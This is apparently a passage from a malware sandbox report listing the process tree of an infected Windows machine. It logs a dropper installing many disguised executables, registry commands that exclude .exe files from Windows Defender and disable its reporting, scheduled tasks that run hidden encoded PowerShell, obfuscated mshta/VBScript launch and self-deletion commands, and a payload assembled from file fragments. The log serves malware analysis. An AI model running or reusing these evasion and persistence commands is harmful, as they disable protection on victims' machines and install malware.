"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2156,6351590249226602092,7051275984064350421,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4540 /prefetch:8
9⤵
PID:41572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,6351590249226602092,7051275984064350421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
9⤵
PID:42588

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,6351590249226602092,7051275984064350421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
9⤵
PID:38272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,6351590249226602092,7051275984064350421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
9⤵
PID:43084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2156,6351590249226602092,7051275984064350421,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4636 /prefetch:8
9⤵
PID:35028

C:\Users\Admin\Pictures\Adobe Films\qULNF_GbAZVqF64nCCgQtLfy.exe
"C:\Users\Admin\Pictures\Adobe Films\qULNF_GbAZVqF64nCCgQtLfy.exe"
4⤵
PID:33920

C:\Users\Admin\Pictures\Adobe Films\mpctDUtc9YZpVOFBK9Mz4ikI.exe
"C:\Users\Admin\Pictures\Adobe Films\mpctDUtc9YZpVOFBK9Mz4ikI.exe"
4⤵
PID:33912

C:\Users\Admin\Pictures\Adobe Films\PUqQIkq0ln_enFgYVKWpwJ8c.exe
"C:\Users\Admin\Pictures\Adobe Films\PUqQIkq0ln_enFgYVKWpwJ8c.exe"
4⤵
PID:33904

C:\Users\Admin\AppData\Local\Temp\is-U93BE.tmp\is-QU5OK.tmp
"C:\Users\Admin\AppData\Local\Temp\is-U93BE.tmp\is-QU5OK.tmp" /SL4 $601F4 "C:\Users\Admin\Pictures\Adobe Films\PUqQIkq0ln_enFgYVKWpwJ8c.exe" 2106088 52736
5⤵
PID:34216

C:\Users\Admin\Pictures\Adobe Films\AcyBnnbQFkwgJbddLReno_3d.exe
"C:\Users\Admin\Pictures\Adobe Films\AcyBnnbQFkwgJbddLReno_3d.exe"
4⤵
PID:33896

C:\Users\Admin\Pictures\Adobe Films\9dUFrvWwHF38szKt0Xurhg26.exe
"C:\Users\Admin\Pictures\Adobe Films\9dUFrvWwHF38szKt0Xurhg26.exe" /SP-/VERYSILENT /SUPPRESSMSGBOXES /INSTALLERSHOWNELSEWHERE /pid=747
4⤵
PID:33888

C:\Users\Admin\AppData\Local\Temp\is-TI4LC.tmp\9dUFrvWwHF38szKt0Xurhg26.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TI4LC.tmp\9dUFrvWwHF38szKt0Xurhg26.tmp" /SL5="$502D8,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\9dUFrvWwHF38szKt0Xurhg26.exe" /SP-/VERYSILENT /SUPPRESSMSGBOXES /INSTALLERSHOWNELSEWHERE /pid=747
5⤵
PID:34364

C:\Users\Admin\Pictures\Adobe Films\UxEDQMlTThG6CSSwtV4Gd2Yi.exe
"C:\Users\Admin\Pictures\Adobe Films\UxEDQMlTThG6CSSwtV4Gd2Yi.exe"
4⤵
PID:33880

C:\Users\Admin\AppData\Local\Temp\892947654.exe
"C:\Users\Admin\AppData\Local\Temp\892947654.exe"
5⤵
PID:40676

C:\Windows\system32\cmd.exe
cmd.exe /c "del C:\Users\Admin\AppData\Local\Temp\892947654.exe"
6⤵
PID:39456

C:\Users\Admin\AppData\Local\Temp\892947654_protected.exe
"C:\Users\Admin\AppData\Local\Temp\892947654_protected.exe"
5⤵
PID:39784

C:\Users\Admin\Pictures\Adobe Films\tbi_T_5jHHPViyfJRY83jm_N.exe
"C:\Users\Admin\Pictures\Adobe Films\tbi_T_5jHHPViyfJRY83jm_N.exe"
4⤵
PID:33872

C:\Users\Admin\AppData\Local\Temp\7zSFC03.tmp\Install.exe
.\Install.exe
5⤵
PID:34644

C:\Users\Admin\AppData\Local\Temp\7zSB36.tmp\Install.exe
.\Install.exe /S /site_id "525403"
6⤵
PID:35008

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
7⤵
PID:36592

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
8⤵
PID:35916

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
9⤵
PID:37368

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
9⤵
PID:38492

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
7⤵
PID:35768

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
8⤵
PID:37276

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
9⤵
PID:38056

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
9⤵
PID:38800

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gDhhcPZSx" /SC once /ST 17:44:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
7⤵
- Creates scheduled task(s)
PID:4008

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gDhhcPZSx"
7⤵
PID:38776

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gDhhcPZSx"
7⤵
PID:42912

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "byVvvJzqHyAXVQJIoq" /SC once /ST 18:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MRGaWINvOOawiIKjY\aMyeiuQKFoHICpx\qvhVXhx.exe\" to /site_id 525403 /S" /V1 /F
7⤵
- Creates scheduled task(s)
PID:43092

C:\Users\Admin\Pictures\Adobe Films\Jn6FCyiFKl9wYdut0N4nwP02.exe
"C:\Users\Admin\Pictures\Adobe Films\Jn6FCyiFKl9wYdut0N4nwP02.exe"
2⤵
PID:3108

C:\Users\Admin\Pictures\Adobe Films\Jn6FCyiFKl9wYdut0N4nwP02.exe
"C:\Users\Admin\Pictures\Adobe Films\Jn6FCyiFKl9wYdut0N4nwP02.exe" -q
3⤵
PID:6216

C:\Users\Admin\Pictures\Adobe Films\sSl_abDHAqO17l49Adp6Nscl.exe
"C:\Users\Admin\Pictures\Adobe Films\sSl_abDHAqO17l49Adp6Nscl.exe"
2⤵
PID:5288

C:\Users\Admin\Pictures\Adobe Films\FmUlF0B6wDZOCcLPz50D27BK.exe
"C:\Users\Admin\Pictures\Adobe Films\FmUlF0B6wDZOCcLPz50D27BK.exe"
2⤵
PID:5228

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscripT: cLosE( crEATEOBjeCt ("WSCrIpt.sHeLL" ).RUn ( "CmD.exe /q /C tYpE ""C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed01649fe394044e.exe"" > ..\d8sm.EXE && sTArT ..\D8SM.EXE /p1NJzJmPRKOYEdcJOVpqa7 &If """" == """" for %T IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed01649fe394044e.exe"" ) do taskkill /f /im ""%~nXT"" " ,0 , TRuE ) )
1⤵
- Checks computer location settings
PID:4024

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /C tYpE "C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed01649fe394044e.exe" > ..\d8sm.EXE&& sTArT ..\D8SM.EXE /p1NJzJmPRKOYEdcJOVpqa7 &If "" == "" for %T IN ( "C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed01649fe394044e.exe" ) do taskkill /f /im "%~nXT"
2⤵
PID:3380

C:\Users\Admin\AppData\Local\Temp\d8sm.EXE
..\D8SM.EXE /p1NJzJmPRKOYEdcJOVpqa7
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:4692

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscripT: cLosE( crEATEOBjeCt ("WSCrIpt.sHeLL" ).RUn ( "CmD.exe /q /C tYpE ""C:\Users\Admin\AppData\Local\Temp\d8sm.EXE"" > ..\d8sm.EXE && sTArT ..\D8SM.EXE /p1NJzJmPRKOYEdcJOVpqa7 &If ""/p1NJzJmPRKOYEdcJOVpqa7 "" == """" for %T IN ( ""C:\Users\Admin\AppData\Local\Temp\d8sm.EXE"" ) do taskkill /f /im ""%~nXT"" " ,0 , TRuE ) )
4⤵
- Checks computer location settings
PID:1000

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /C tYpE "C:\Users\Admin\AppData\Local\Temp\d8sm.EXE" > ..\d8sm.EXE&& sTArT ..\D8SM.EXE /p1NJzJmPRKOYEdcJOVpqa7 &If "/p1NJzJmPRKOYEdcJOVpqa7 " == "" for %T IN ( "C:\Users\Admin\AppData\Local\Temp\d8sm.EXE" ) do taskkill /f /im "%~nXT"
5⤵
PID:3748

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRipt: CloSe ( CReateoBJEct ( "WSCRipT.SHELl" ).RuN( "Cmd /R EcHo | SEt /P = ""MZ"" > A8JeQ1C.C& COPY /b /Y a8JEQ1C.c + H_FMOGI.InN + YZI1FCO._QT+ URiHWL_A.ZC + 8S2~Cs.VBM ..\_OubOW.FE &del /Q *&stART msiexec.exe -y ..\_OUboW.FE " ,0 , tRuE ))
4⤵
- Checks computer location settings
PID:4808

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R EcHo | SEt /P = "MZ" >A8JeQ1C.C& COPY /b /Y a8JEQ1C.c+ H_FMOGI.InN + YZI1FCO._QT+ URiHWL_A.ZC + 8S2~Cs.VBM ..\_OubOW.FE &del /Q *&stART msiexec.exe -y ..\_OUboW.FE
5⤵
PID:3788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHo "
6⤵
PID:4540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>A8JeQ1C.C"
6⤵
PID:1772

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -y ..\_OUboW.FE
6⤵
- Loads dropped DLL
PID:1948

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "Wed01649fe394044e.exe"
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2092

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed016c01e4e1de9.exe
Wed016c01e4e1de9.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4852

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed010dc6015ee.exe
Wed010dc6015ee.exe
1⤵
- Executes dropped EXE
PID:1884

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed01d85f2899987.exe
Wed01d85f2899987.exe
1⤵
- Executes dropped EXE
PID:2668

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed01d85f2899987.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed01d85f2899987.exe" -u
2⤵
- Executes dropped EXE
PID:3540

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed01649fe394044e.exe
Wed01649fe394044e.exe
1⤵
PID:2216

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed011abd65cf6e.exe
Wed011abd65cf6e.exe
1⤵
- Executes dropped EXE
PID:2176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2176 -s 1028
2⤵
- Program crash
PID:2612

C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed01f7e5b93d9.exe
Wed01f7e5b93d9.exe
1⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
PID:792

C:\Users\Admin\Pictures\Adobe Films\av2MhsQSx7eKKrLOyy1BDhfA.exe
"C:\Users\Admin\Pictures\Adobe Films\av2MhsQSx7eKKrLOyy1BDhfA.exe"
2⤵
PID:3048

C:\Users\Admin\AppData\Local\Temp\is-MMBBK.tmp\is-0AS1J.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MMBBK.tmp\is-0AS1J.tmp" /SL4 $2022C "C:\Users\Admin\Pictures\Adobe Films\av2MhsQSx7eKKrLOyy1BDhfA.exe" 2106088 52736
3⤵
PID:3404

C:\Program Files (x86)\etSearcher\etsearcher58.exe
"C:\Program Files (x86)\etSearcher\etsearcher58.exe"
4⤵
PID:4356

C:\Users\Admin\AppData\Roaming\{99cae5c0-1ab4-11ed-899c-806e6f6e6963}\ZZ9iVZQk.exe
5⤵
PID:5552

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "etsearcher58.exe" /f & erase "C:\Program Files (x86)\etSearcher\etsearcher58.exe" & exit
5⤵
PID:37112

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "etsearcher58.exe" /f
6⤵
- Kills process with taskkill
PID:38420

C:\Users\Admin\Pictures\Adobe Films\aw5nhxQRvUdg1bG95dC0lSVT.exe
"C:\Users\Admin\Pictures\Adobe Films\aw5nhxQRvUdg1bG95dC0lSVT.exe"
2⤵
PID:1948

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:5856

C:\Users\Admin\Pictures\Adobe Films\adLKZBTsw03jHKYt_1LausCz.exe
"C:\Users\Admin\Pictures\Adobe Films\adLKZBTsw03jHKYt_1LausCz.exe"
2⤵
PID:3452

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:7864

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:7920

C:\Users\Admin\Documents\omYF9lLz_RWE29QXm7VqDS_8.exe
"C:\Users\Admin\Documents\omYF9lLz_RWE29QXm7VqDS_8.exe"
3⤵
PID:7856

C:\Users\Admin\Pictures\Adobe Films\VmoDXFzu9xcqkeSH4OJNMU7j.exe
"C:\Users\Admin\Pictures\Adobe Films\VmoDXFzu9xcqkeSH4OJNMU7j.exe"
4⤵
PID:2484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 304
5⤵
- Program crash
PID:34712

C:\Users\Admin\Pictures\Adobe Films\mpctDUtc9YZpVOFBK9Mz4ikI.exe
"C:\Users\Admin\Pictures\Adobe Films\mpctDUtc9YZpVOFBK9Mz4ikI.exe"
4⤵
PID:34392

C:\Users\Admin\Pictures\Adobe Films\4qxM4uTKtVxkYZc_6oIdQnrH.exe
"C:\Users\Admin\Pictures\Adobe Films\4qxM4uTKtVxkYZc_6oIdQnrH.exe"
4⤵
PID:6672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Get-WmiObject Win32_PortConnector"
5⤵
PID:35348

C:\Users\Admin\Pictures\Adobe Films\CgfqwZEoJ5h1knIUHVcPDDNT.exe
"C:\Users\Admin\Pictures\Adobe Films\CgfqwZEoJ5h1knIUHVcPDDNT.exe"
4⤵
PID:34564

C:\Users\Admin\Pictures\Adobe Films\8jDS4dgRHYYpL20dz6aSYola.exe
"C:\Users\Admin\Pictures\Adobe Films\8jDS4dgRHYYpL20dz6aSYola.exe"
4⤵
PID:33712

C:\Windows\SysWOW64\at.exe
at 3874982763784yhwgdfg78234789s42809374918uf
5⤵
PID:35836

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Florist.hopp & ping -n 5 localhost
5⤵
PID:36524

C:\Windows\SysWOW64\cmd.exe
cmd
6⤵
PID:7432

C:\Users\Admin\Pictures\Adobe Films\haXxyKI38c07x9YLU9Svjiyr.exe
"C:\Users\Admin\Pictures\Adobe Films\haXxyKI38c07x9YLU9Svjiyr.exe"
4⤵
PID:8940

C:\Users\Admin\AppData\Local\Temp\is-IK51G.tmp\haXxyKI38c07x9YLU9Svjiyr.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IK51G.tmp\haXxyKI38c07x9YLU9Svjiyr.tmp" /SL5="$60256,254182,170496,C:\Users\Admin\Pictures\Adobe Films\haXxyKI38c07x9YLU9Svjiyr.exe"
5⤵
PID:35240

C:\Users\Admin\AppData\Local\Temp\is-9P2NQ.tmp\PowerOff.exe
"C:\Users\Admin\AppData\Local\Temp\is-9P2NQ.tmp\PowerOff.exe" /S /UID=95
6⤵
PID:9268

C:\Users\Admin\AppData\Local\Temp\d2-58b75-1c2-808aa-e830f08539cbc\Bovagyqega.exe
"C:\Users\Admin\AppData\Local\Temp\d2-58b75-1c2-808aa-e830f08539cbc\Bovagyqega.exe"
7⤵
PID:37588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\031zhrbu.ga4\GcleanerEU.exe /eufive & exit
8⤵
PID:40684

C:\Users\Admin\AppData\Local\Temp\031zhrbu.ga4\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\031zhrbu.ga4\GcleanerEU.exe /eufive
9⤵
PID:40468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 40468 -s 452
10⤵
- Program crash
PID:41368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 40468 -s 764
10⤵
- Program crash
PID:42340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 40468 -s 772
10⤵
- Program crash
PID:4812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 40468 -s 780
10⤵
- Program crash
PID:44004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 40468 -s 764
10⤵
- Program crash
PID:41296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 40468 -s 1016
10⤵
- Program crash
PID:44792

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mzkgmvq0.tjk\gcleaner.exe /mixfive & exit
8⤵
PID:40944

C:\Users\Admin\AppData\Local\Temp\mzkgmvq0.tjk\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\mzkgmvq0.tjk\gcleaner.exe /mixfive
9⤵
PID:40752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 40752 -s 456
10⤵
- Program crash
PID:41448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 40752 -s 764
10⤵
- Program crash
PID:42508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 40752 -s 772
10⤵
- Program crash
PID:41684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 40752 -s 816
10⤵
- Program crash
PID:43988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 40752 -s 860
10⤵
- Program crash
PID:43988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 40752 -s 984
10⤵
- Program crash
PID:43020

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2mta0qxj.fzg\random.exe & exit
8⤵
PID:39512

C:\Users\Admin\AppData\Local\Temp\2mta0qxj.fzg\random.exe
C:\Users\Admin\AppData\Local\Temp\2mta0qxj.fzg\random.exe
9⤵
PID:39708

C:\Users\Admin\AppData\Local\Temp\2mta0qxj.fzg\random.exe
"C:\Users\Admin\AppData\Local\Temp\2mta0qxj.fzg\random.exe" -q
10⤵
PID:42112

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\idrjf4ug.foo\mp3studios_10.exe & exit
8⤵
PID:40372

C:\Users\Admin\AppData\Local\Temp\idrjf4ug.foo\mp3studios_10.exe
C:\Users\Admin\AppData\Local\Temp\idrjf4ug.foo\mp3studios_10.exe
9⤵
PID:41860

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
10⤵
PID:43040

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
11⤵
- Kills process with taskkill
PID:41060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
10⤵
PID:42236

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa551c4f50,0x7ffa551c4f60,0x7ffa551c4f70
11⤵
PID:44108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1684,4440899086562085482,1887686313087348685,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1752 /prefetch:8
11⤵
PID:43944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1684,4440899086562085482,1887686313087348685,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1712 /prefetch:2
11⤵
PID:45052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1684,4440899086562085482,1887686313087348685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2308 /prefetch:8
11⤵
PID:44232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,4440899086562085482,1887686313087348685,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:1
11⤵
PID:44648

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,4440899086562085482,1887686313087348685,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2920 /prefetch:1
11⤵
PID:44264

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wg14qmbr.trv\pb1117.exe & exit
8⤵
PID:37424

C:\Users\Admin\AppData\Local\Temp\wg14qmbr.trv\pb1117.exe
C:\Users\Admin\AppData\Local\Temp\wg14qmbr.trv\pb1117.exe
9⤵
PID:41680

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wxtnaiy3.q4f\toolspab3.exe & exit
8⤵
PID:39568

C:\Users\Admin\AppData\Local\Temp\wxtnaiy3.q4f\toolspab3.exe
C:\Users\Admin\AppData\Local\Temp\wxtnaiy3.q4f\toolspab3.exe
9⤵
PID:42464

C:\Users\Admin\AppData\Local\Temp\wxtnaiy3.q4f\toolspab3.exe
C:\Users\Admin\AppData\Local\Temp\wxtnaiy3.q4f\toolspab3.exe
10⤵
PID:42972

C:\Users\Admin\Pictures\Adobe Films\AcyBnnbQFkwgJbddLReno_3d.exe
"C:\Users\Admin\Pictures\Adobe Films\AcyBnnbQFkwgJbddLReno_3d.exe"
4⤵
PID:34868

C:\Users\Admin\Pictures\Adobe Films\UxEDQMlTThG6CSSwtV4Gd2Yi.exe
"C:\Users\Admin\Pictures\Adobe Films\UxEDQMlTThG6CSSwtV4Gd2Yi.exe"
4⤵
PID:34860

C:\Users\Admin\Pictures\Adobe Films\ReDjBS6F_WSL1YkS2B_W2XMP.exe
"C:\Users\Admin\Pictures\Adobe Films\ReDjBS6F_WSL1YkS2B_W2XMP.exe"
4⤵
PID:34848

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /Y .\TW0KDS.y
5⤵
PID:35508

C:\Users\Admin\Pictures\Adobe Films\qULNF_GbAZVqF64nCCgQtLfy.exe
"C:\Users\Admin\Pictures\Adobe Films\qULNF_GbAZVqF64nCCgQtLfy.exe"
4⤵
PID:8088

C:\Users\Admin\Pictures\Adobe Films\tbi_T_5jHHPViyfJRY83jm_N.exe
"C:\Users\Admin\Pictures\Adobe Films\tbi_T_5jHHPViyfJRY83jm_N.exe"
4⤵
PID:34376

C:\Users\Admin\AppData\Local\Temp\7zSFBA.tmp\Install.exe
.\Install.exe
5⤵
PID:35724

C:\Users\Admin\AppData\Local\Temp\7zS2313.tmp\Install.exe
.\Install.exe /S /site_id "525403"
6⤵
PID:35872

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
7⤵
PID:37756

C:\Windows\SysWOW64\cmd.exe
